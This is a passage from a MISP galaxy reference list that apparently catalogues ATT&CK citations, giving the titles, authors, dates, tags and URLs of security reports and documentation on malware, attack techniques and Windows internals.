The tag is: misp-galaxy:references="acunetix Server Secuirty"

Table 16059. Table References

Links

https://www.acunetix.com/websitesecurity/webserver-security/

Microsoft Well Known SIDs Jun 2017

Microsoft. (2017, June 23). Well-known security identifiers in Windows operating systems. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft Well Known SIDs Jun 2017"

Table 16060. Table References

Links

https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems

PWC WellMess C2 August 2020

PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020.

The tag is: misp-galaxy:references="PWC WellMess C2 August 2020"

Table 16061. Table References

Links

https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html

Cofense Astaroth Sept 2018

Doaty, J., Garrett, P.. (2018, September 10). We’re Seeing a Resurgence of the Demonic Astaroth WMIC Trojan. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="Cofense Astaroth Sept 2018"

Table 16062. Table References

Links

https://cofense.com/seeing-resurgence-demonic-astaroth-wmic-trojan/

Wevtutil Microsoft Documentation

Microsoft. (n.d.). wevtutil. Retrieved September 14, 2021.

The tag is: misp-galaxy:references="Wevtutil Microsoft Documentation"

Table 16063. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil

Microsoft wevtutil Oct 2017

Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018.

The tag is: misp-galaxy:references="Microsoft wevtutil Oct 2017"

Table 16064. Table References

Links

https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil

Wfc.exe - LOLBAS Project

LOLBAS. (2021, September 26). Wfc.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Wfc.exe - LOLBAS Project"

Table 16065. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/

Crowdstrike Downgrade

Bart Lenaerts-Bergman. (2023, March 14). WHAT ARE DOWNGRADE ATTACKS?. Retrieved May 24, 2023.

The tag is: misp-galaxy:references="Crowdstrike Downgrade"

Table 16066. Table References

Links

https://www.crowdstrike.com/cybersecurity-101/attack-types/downgrade-attacks/

Chrome Extensions Definition

Chrome. (n.d.). What are Extensions?. Retrieved November 16, 2017.

The tag is: misp-galaxy:references="Chrome Extensions Definition"

Table 16067. Table References

Links

https://developer.chrome.com/extensions

StackExchange Hooks Jul 2012

Stack Exchange - Security. (2012, July 31). What are the methods to find hooked functions and APIs?. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="StackExchange Hooks Jul 2012"

Table 16068. Table References

Links

https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis

macOS APT Activity Bradley

Jaron Bradley. (2021, November 14). What does APT Activity Look Like on macOS?. Retrieved January 19, 2022.

The tag is: misp-galaxy:references="macOS APT Activity Bradley"

Table 16069. Table References

Links

https://themittenmac.com/what-does-apt-activity-look-like-on-macos/

okta

okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.

The tag is: misp-galaxy:references="okta"

Table 16070. Table References

Links

https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen

Norton Botnet

Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020.

The tag is: misp-galaxy:references="Norton Botnet"

Table 16071. Table References

Links

https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html

Microsoft DLL

Microsoft. (2023, April 28). What is a DLL. Retrieved September 7, 2023.

The tag is: misp-galaxy:references="Microsoft DLL"

Table 16072. Table References

Links

https://learn.microsoft.com/troubleshoot/windows-client/deployment/dynamic-link-library

Cloudflare DNSamplficationDoS

Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Cloudflare DNSamplficationDoS"

Table 16073. Table References

Links

https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/

Amazon AWS VPC Guide

Amazon. (n.d.). What Is Amazon VPC?. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Amazon AWS VPC Guide"

Table 16074. Table References

Links

https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html

Cloudflare HTTPflood

Cloudflare. (n.d.). What is an HTTP flood DDoS attack?. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Cloudflare HTTPflood"

Table 16075. Table References

Links

https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/

Cloudflare NTPamplifciationDoS

Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Cloudflare NTPamplifciationDoS"

Table 16076. Table References

Links

https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/

Microsoft Primary Refresh Token

Microsoft. (2022, September 9). What is a Primary Refresh Token?. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Microsoft Primary Refresh Token"

Table 16077. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token

Comparitech Replay Attack

Justin Schamotta. (2022, October 28). What is a replay attack?. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Comparitech Replay Attack"

Table 16078. Table References

Links

https://www.comparitech.com/blog/information-security/what-is-a-replay-attack/

Corero SYN-ACKflood

Corero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Corero SYN-ACKflood"

Table 16079. Table References

Links

https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html

Cloudflare SynFlood

Cloudflare. (n.d.). What is a SYN flood attack?. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Cloudflare SynFlood"

Table 16080. Table References

Links

https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/

Amazon VM

Microsoft. (n.d.). What is a virtual machine (VM)?. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Amazon VM"

Table 16081. Table References

Links

https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/

RedHat Webhooks

RedHat. (2022, June 1). What is a webhook?. Retrieved July 20, 2023.

The tag is: misp-galaxy:references="RedHat Webhooks"

Table 16082. Table References

Links

https://www.redhat.com/en/topics/automation/what-is-a-webhook

AWS System Manager

AWS. (2023, June 2). What is AWS System Manager?. Retrieved June 2, 2023.

The tag is: misp-galaxy:references="AWS System Manager"

Table 16083. Table References

Links

https://docs.aws.amazon.com/systems-manager/latest/userguide/what-is-systems-manager.html

Microsoft Azure Virtual Network Overview

Annamalai, N., Casey, C., Almeida, M., et. al.. (2019, June 18). What is Azure Virtual Network?. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Microsoft Azure Virtual Network Overview"

Table 16084. Table References

Links

https://docs.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview

CrowdStrike-BEC

Bart Lenaerts-Bergmans. (2023, March 10). What is Business Email Compromise?. Retrieved August 8, 2023.

The tag is: misp-galaxy:references="CrowdStrike-BEC"

Table 16085. Table References

Links

https://www.crowdstrike.com/cybersecurity-101/business-email-compromise-bec/

PAN DNS Tunneling

Palo Alto Networks. (n.d.). What Is DNS Tunneling?. Retrieved March 15, 2020.

The tag is: misp-galaxy:references="PAN DNS Tunneling"

Table 16086. Table References

Links

https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling

Proofpoint-spoof

Proofpoint. (n.d.). What Is Email Spoofing?. Retrieved February 24, 2023.

The tag is: misp-galaxy:references="Proofpoint-spoof"

Table 16087. Table References

Links

https://www.proofpoint.com/us/threat-reference/email-spoofing

magnusviri emond Apr 2016

Reynolds, James. (2016, April 7). What is emond?. Retrieved September 10, 2019.

The tag is: misp-galaxy:references="magnusviri emond Apr 2016"

Table 16088. Table References

Links

http://www.magnusviri.com/Mac/what-is-emond.html

Microsoft - Azure AD Federation

Microsoft. (2018, November 28). What is federation with Azure AD?. Retrieved December 30, 2020.

The tag is: misp-galaxy:references="Microsoft - Azure AD Federation"

Table 16089. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed

grsecurity official

grsecurity. (2017, December 12). What is grsecurity?. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="grsecurity official"

Table 16090. Table References

Links

https://grsecurity.net/

VDSO Aug 2005

Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved June 16, 2020.

The tag is: misp-galaxy:references="VDSO Aug 2005"

Table 16091. Table References

Links

https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/

what_is_mmc

Microsoft. (2020, September 27). What is Microsoft Management Console?. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="what_is_mmc"

Table 16092. Table References

Links

https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console

Microsoft NET

Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020.

The tag is: misp-galaxy:references="Microsoft NET"

Table 16093. Table References

Links

https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework

Pastebin EchoSec

Ciarniello, A. (2019, September 24). What is Pastebin and Why Do Hackers Love It?. Retrieved April 11, 2023.

The tag is: misp-galaxy:references="Pastebin EchoSec"

Table 16094. Table References

Links

https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it

Microsoft Protected View

Microsoft. (n.d.). What is Protected View?. Retrieved November 22, 2017.

The tag is: misp-galaxy:references="Microsoft Protected View"

Table 16095. Table References

Links

https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653

TechNet RPC

Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.

The tag is: misp-galaxy:references="TechNet RPC"

Table 16096. Table References

Links

https://technet.microsoft.com/en-us/library/cc787851.aspx

IOKit Fundamentals

Apple. (2014, April 9). What Is the I/O Kit?. Retrieved September 24, 2021.

The tag is: misp-galaxy:references="IOKit Fundamentals"

Table 16097. Table References

Links

https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html

Baeldung LD_PRELOAD

baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Baeldung LD_PRELOAD"

Table 16098. Table References

Links

https://www.baeldung.com/linux/ld_preload-trick-what-is

Microsoft VBScript

Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020.

The tag is: misp-galaxy:references="Microsoft VBScript"

Table 16099. Table References

Links

https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)

VEC

CloudFlare. (n.d.). What is vendor email compromise (VEC)?. Retrieved September 12, 2023.

The tag is: misp-galaxy:references="VEC"

Table 16100. Table References

Links

https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/::text=Vendor%20email%20compromise%2C%20also%20referred

Proofpoint Vishing

Proofpoint. (n.d.). What Is Vishing?. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="Proofpoint Vishing"

Table 16101. Table References

Links

https://www.proofpoint.com/us/threat-reference/vishing

taxonomy_downgrade_att_tls

Alashwali, E. S., Rasmussen, K. (2019, January 26). What’s in a Downgrade? A Taxonomy of Downgrade Attacks in the TLS Protocol and Application Protocols Using TLS. Retrieved December 7, 2021.

The tag is: misp-galaxy:references="taxonomy_downgrade_att_tls"

Table 16102. Table References

Links

https://arxiv.org/abs/1809.05681

FireEye fxsst June 2011

Harbour, N. (2011, June 3). What the fxsst?. Retrieved November 17, 2020.

The tag is: misp-galaxy:references="FireEye fxsst June 2011"

Table 16103. Table References

Links

https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html

Krebs Capital One August 2019

Krebs, B.. (2019, August 19). What We Can Learn from the Capital One Hack. Retrieved March 25, 2020.

The tag is: misp-galaxy:references="Krebs Capital One August 2019"

Table 16104. Table References

Links

https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/

Symantec ADS May 2009

Pravs. (2009, May 25). What you need to know about alternate data streams in windows? Is your Data secure? Can you restore that?. Retrieved March 21, 2018.

The tag is: misp-galaxy:references="Symantec ADS May 2009"

Table 16105. Table References

Links

https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore

BH Manul Aug 2016

Galperin, E., Et al.. (2016, August 4). When Governments Attack: State Sponsored Malware Attacks Against Activists, Lawyers, and Journalists. Retrieved May 23, 2018.

The tag is: misp-galaxy:references="BH Manul Aug 2016"

Table 16106. Table References

Links

https://www.blackhat.com/docs/us-16/materials/us-16-Quintin-When-Governments-Attack-State-Sponsored-Malware-Attacks-Against-Activists-Lawyers-And-Journalists.pdf

Dragos Heroku Watering Hole

Kent Backman. (2021, May 18). When Intrusions Don’t Align: A New Water Watering Hole and Oldsmar. Retrieved August 18, 2022.

The tag is: misp-galaxy:references="Dragos Heroku Watering Hole"

Table 16107. Table References

Links

https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/

SpectorOps Bifrost Kerberos macOS 2019

Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost. Retrieved October 6, 2021.

The tag is: misp-galaxy:references="SpectorOps Bifrost Kerberos macOS 2019"

Table 16108. Table References

Links

https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f

Palo Alto Brute Ratel July 2022

Harbison, M. and Renals, P. (2022, July 5). When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors. Retrieved February 1, 2023.

The tag is: misp-galaxy:references="Palo Alto Brute Ratel July 2022"

Table 16109. Table References

Links

https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/

Trend Micro When Phishing Starts from the Inside 2017

Chris Taylor. (2017, October 5). When Phishing Starts from the Inside. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="Trend Micro When Phishing Starts from the Inside 2017"

Table 16110. Table References

Links

https://blog.trendmicro.com/phishing-starts-inside/

Booz Allen Hamilton

Booz Allen Hamilton. (n.d.). When The Lights Went Out. Retrieved October 22, 2019

The tag is: misp-galaxy:references="Booz Allen Hamilton"

Table 16111. Table References

Links

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

Microsoft Where to use TxF

Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Microsoft Where to use TxF"

Table 16112. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx

Brining MimiKatz to Unix

Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Brining MimiKatz to Unix"

Table 16113. Table References

Links

https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf

Dell Lateral Movement

Carvey, H.. (2014, September 2). Where you AT?: Indicators of lateral movement using at.exe on Windows 7 systems. Retrieved January 25, 2016.

The tag is: misp-galaxy:references="Dell Lateral Movement"

Table 16114. Table References

Links

http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/

Secureworks - AT.exe Scheduled Task

Carvey, H.. (2014, September). Where You AT?: Indicators of Lateral Movement Using at.exe on Windows 7 Systems. Retrieved November 27, 2019.

The tag is: misp-galaxy:references="Secureworks - AT.exe Scheduled Task"

Table 16115. Table References

Links

https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems

Cybereason WhisperGate February 2022

Cybereason Nocturnus. (2022, February 15). Cybereason vs. WhisperGate and HermeticWiper. Retrieved March 10, 2022.

The tag is: misp-galaxy:references="Cybereason WhisperGate February 2022"

Table 16116. Table References

Links

https://www.cybereason.com/blog/cybereason-vs.-whispergate-wiper

RecordedFuture WhisperGate Jan 2022

Insikt Group. (2020, January 28). WhisperGate Malware Corrupts Computers in Ukraine. Retrieved March 31, 2023.

The tag is: misp-galaxy:references="RecordedFuture WhisperGate Jan 2022"

Table 16117. Table References

Links

https://www.recordedfuture.com/whispergate-malware-corrupts-computers-ukraine

Symantec Whitefly March 2019

Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020.

The tag is: misp-galaxy:references="Symantec Whitefly March 2019"

Table 16118. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore

Accenture Lyceum Targets November 2021

Accenture. (2021, November 9). Who are latest targets of cyber group Lyceum?. Retrieved June 16, 2022.

The tag is: misp-galaxy:references="Accenture Lyceum Targets November 2021"

Table 16119. Table References

Links

https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns

Krebs-Anna

Brian Krebs. (2017, January 18). Who is Anna-Senpai, the Mirai Worm Author?. Retrieved May 15, 2017.

The tag is: misp-galaxy:references="Krebs-Anna"

Table 16120. Table References

Links

https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/

CrowdStrike Ember Bear Profile March 2022

CrowdStrike. (2022, March 30). Who is EMBER BEAR?. Retrieved June 9, 2022.

The tag is: misp-galaxy:references="CrowdStrike Ember Bear Profile March 2022"

Table 16121. Table References

Links

https://www.crowdstrike.com/blog/who-is-ember-bear/

WHOIS

NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="WHOIS"

Table 16122. Table References

Links

https://www.whois.net/

Meyers Numbered Panda

Meyers, A. (2013, March 29). Whois Numbered Panda. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="Meyers Numbered Panda"

Table 16123. Table References

Links

http://www.crowdstrike.com/blog/whois-numbered-panda/

CrowdStrike PIONEER KITTEN August 2020

Orleans, A. (2020, August 31). Who Is PIONEER KITTEN?. Retrieved December 21, 2020.

The tag is: misp-galaxy:references="CrowdStrike PIONEER KITTEN August 2020"

Table 16124. Table References

Links

https://www.crowdstrike.com/blog/who-is-pioneer-kitten/

SECURELIST Bright Star 2015

Baumgartner, K., Guerrero-Saade, J. (2015, March 4). Who’s Really Spreading through the Bright Star?. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="SECURELIST Bright Star 2015"

Table 16125. Table References

Links

https://securelist.com/whos-really-spreading-through-the-bright-star/68978/

Trend Micro Privileged Container

Fiser, D., Oliveira, A.. (2019, December 20). Why a Privileged Container in Docker is a Bad Idea. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="Trend Micro Privileged Container"

Table 16126. Table References

Links

https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html

Mandiant UNC3944 September 14 2023

Mandiant Intelligence. (2023, September 14). Why Are You Texting Me? UNC3944 Leverages SMS Phishing Campaigns for SIM Swapping, Ransomware, Extortion, and Notoriety. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="Mandiant UNC3944 September 14 2023"

Table 16127. Table References

Links

https://www.mandiant.com/resources/blog/unc3944-sms-phishing-sim-swapping-ransomware

Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019

Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019"

Table 16128. Table References

Links

https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/

Securelist Digital Certificates

Ladikov, A. (2015, January 29). Why You Shouldn’t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.

The tag is: misp-galaxy:references="Securelist Digital Certificates"

Table 16129. Table References

Links

https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/

Crowdstrike DNS Hijack 2019

Matt Dahl. (2019, January 25). Widespread DNS Hijacking Activity Targets Multiple Sectors. Retrieved February 14, 2022.

The tag is: misp-galaxy:references="Crowdstrike DNS Hijack 2019"

Table 16130. Table References

Links

https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/

Wi-Fi Password of All Connected Networks in Windows/Linux

Geeks for Geeks. (n.d.). Wi-Fi Password of All Connected Networks in Windows/Linux. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="Wi-Fi Password of All Connected Networks in Windows/Linux"

Table 16131. Table References

Links

https://www.geeksforgeeks.org/wi-fi-password-connected-networks-windowslinux/

Wikipedia Exe Compression

Executable compression. (n.d.). Retrieved December 4, 2014.

The tag is: misp-galaxy:references="Wikipedia Exe Compression"

Table 16132. Table References

Links

http://en.wikipedia.org/wiki/Executable_compression

ESET Carberp March 2012

Matrosov, A., Rodionov, E., Volkov, D., Harley, D. (2012, March 2). Win32/Carberp When You’re in a Black Hole, Stop Digging. Retrieved July 15, 2020.

The tag is: misp-galaxy:references="ESET Carberp March 2012"

Table 16133. Table References

Links

https://www.eset.com/fileadmin/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf

ESET Industroyer

Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="ESET Industroyer"

Table 16134. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

Microsoft Kasidet

Manuel, J. and Plantado, R.. (2015, August 9). Win32/Kasidet. Retrieved March 24, 2016.

The tag is: misp-galaxy:references="Microsoft Kasidet"

Table 16135. Table References

Links

http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32%2FKasidet

ESET Ebury Oct 2017

Vachon, F. (2017, October 30). Windigo Still not Windigone: An Ebury Update . Retrieved February 10, 2021.

The tag is: misp-galaxy:references="ESET Ebury Oct 2017"

Table 16136. Table References

Links

https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/

Microsoft AMSI June 2015

Microsoft. (2015, June 9). Windows 10 to offer application developers new malware defenses. Retrieved February 12, 2018.

The tag is: misp-galaxy:references="Microsoft AMSI June 2015"

Table 16137. Table References

Links

https://cloudblogs.microsoft.com/microsoftsecure/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/?source=mmpc

Davidson Windows

Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Davidson Windows"

Table 16138. Table References

Links

http://www.pretentiousname.com/misc/win7_uac_whitelist2.html

IRED API Hashing

spotheplanet. (n.d.). Windows API Hashing in Malware. Retrieved August 22, 2022.

The tag is: misp-galaxy:references="IRED API Hashing"

Table 16139. Table References

Links

https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware

TrendMicro WindowsAppMac

Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads Info Stealer and Adware. Retrieved April 25, 2019.

The tag is: misp-galaxy:references="TrendMicro WindowsAppMac"

Table 16140. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/

Windows Commands JPCERT

Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.

The tag is: misp-galaxy:references="Windows Commands JPCERT"

Table 16141. Table References

Links

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

Amplia WCE

Amplia Security. (n.d.). Windows Credentials Editor (WCE) F.A.Q.. Retrieved December 17, 2015.

The tag is: misp-galaxy:references="Amplia WCE"

Table 16142. Table References

Links

http://www.ampliasecurity.com/research/wcefaq.html

Microsoft Windows Defender Application Control

Gorzelany, A., Hall, J., Poggemeyer, L.. (2019, January 7). Windows Defender Application Control. Retrieved July 16, 2019.

The tag is: misp-galaxy:references="Microsoft Windows Defender Application Control"

Table 16143. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/windows-defender-application-control

Microsoft Operation Wilysupply

Florio, E.. (2017, May 4). Windows Defender ATP thwarts Operation WilySupply software supply chain cyberattack. Retrieved February 14, 2019.

The tag is: misp-galaxy:references="Microsoft Operation Wilysupply"

Table 16144. Table References

Links

https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/

PassLib mscache

Eli Collins. (2016, November 25). Windows' Domain Cached Credentials v2. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="PassLib mscache"

Table 16145. Table References

Links

https://passlib.readthedocs.io/en/stable/lib/passlib.hash.msdcc2.html

ProjectZero File Write EoP Apr 2018

Forshaw, J. (2018, April 18). Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege. Retrieved May 3, 2018.

The tag is: misp-galaxy:references="ProjectZero File Write EoP Apr 2018"

Table 16146. Table References

Links

https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html

DBAPPSecurity BITTER zero-day Feb 2021

JinQuan, MaDongZe, TuXiaoYi, and LiHao. (2021, February 10). Windows kernel zero-day exploit (CVE-2021-1732) is used by BITTER APT in targeted attack. Retrieved June 1, 2022.

The tag is: misp-galaxy:references="DBAPPSecurity BITTER zero-day Feb 2021"

Table 16147. Table References

Links

https://ti.dbappsecurity.com.cn/blog/articles/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/

EyeofRa Detecting Hooking June 2017

Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense against user-land. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="EyeofRa Detecting Hooking June 2017"

Table 16148. Table References

Links

https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/

Passcape LSA Secrets

Passcape. (n.d.). Windows LSA secrets. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="Passcape LSA Secrets"

Table 16149. Table References

Links

https://www.passcape.com/index.php?section=docsys&cmd=details&id=23

Windows Malware Infecting Android

Lucian Constantin. (2014, January 23). Windows malware tries to infect Android devices connected to PCs. Retrieved May 25, 2022.

The tag is: misp-galaxy:references="Windows Malware Infecting Android"

Table 16150. Table References

Links

https://www.computerworld.com/article/2486903/windows-malware-tries-to-infect-android-devices-connected-to-pcs.html

MSDN WMI

Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.

The tag is: misp-galaxy:references="MSDN WMI"

Table 16151. Table References

Links

https://msdn.microsoft.com/en-us/library/aa394582.aspx

FireEye WMI 2015

Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.

The tag is: misp-galaxy:references="FireEye WMI 2015"

Table 16152. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf

win_msc_files_overview

Brinkmann, M.. (2017, June 10). Windows .msc files overview. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="win_msc_files_overview"

Table 16153. Table References

Links

https://www.ghacks.net/2017/06/10/windows-msc-files-overview/

Hill NT Shell

Hill, T. (n.d.). Windows NT Command Shell. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Hill NT Shell"

Table 16154. Table References

Links

http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120

passcape Windows Vault

Passcape. (n.d.). Windows Password Recovery - Vault Explorer and Decoder. Retrieved November 24, 2020.

The tag is: misp-galaxy:references="passcape Windows Vault"

Table 16155. Table References

Links

https://www.passcape.com/windows_password_recovery_vault_explorer

Malware Archaeology PowerShell Cheat Sheet

Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.

The tag is: misp-galaxy:references="Malware Archaeology PowerShell Cheat Sheet"

Table 16156. Table References

Links

http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf

TechNet PowerShell

Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016.

The tag is: misp-galaxy:references="TechNet PowerShell"

Table 16157. Table References

Links

https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx

Windows Privilege Escalation Guide

absolomb. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018.

The tag is: misp-galaxy:references="Windows Privilege Escalation Guide"

Table 16158. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

SploitSpren Windows Priv Jan 2018

McFarland, R. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018.

The tag is: misp-galaxy:references="SploitSpren Windows Priv Jan 2018"

Table 16159. Table References

Links

https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/

SecurityBoulevard Unquoted Services APR 2018

HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted Services. Retrieved August 10, 2018.

The tag is: misp-galaxy:references="SecurityBoulevard Unquoted Services APR 2018"

Table 16160. Table References

Links

https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/

Windows Unquoted Services

HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted Services. Retrieved August 10, 2018.

The tag is: misp-galaxy:references="Windows Unquoted Services"

Table 16161. Table References

Links

https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/

Windows Process Injection KernelCallbackTable

odzhan. (2019, May 25). Windows Process Injection: KernelCallbackTable used by FinFisher / FinSpy. Retrieved February 4, 2022.

The tag is: misp-galaxy:references="Windows Process Injection KernelCallbackTable"

Table 16162. Table References

Links

https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/

Modexp Windows Process Injection

odzhan. (2019, April 25). Windows Process Injection: WordWarping, Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline. Retrieved November 15, 2021.

The tag is: misp-galaxy:references="Modexp Windows Process Injection"

Table 16163. Table References

Links

https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/

Wikipedia Windows Registry

Wikipedia. (n.d.). Windows Registry. Retrieved February 2, 2015.

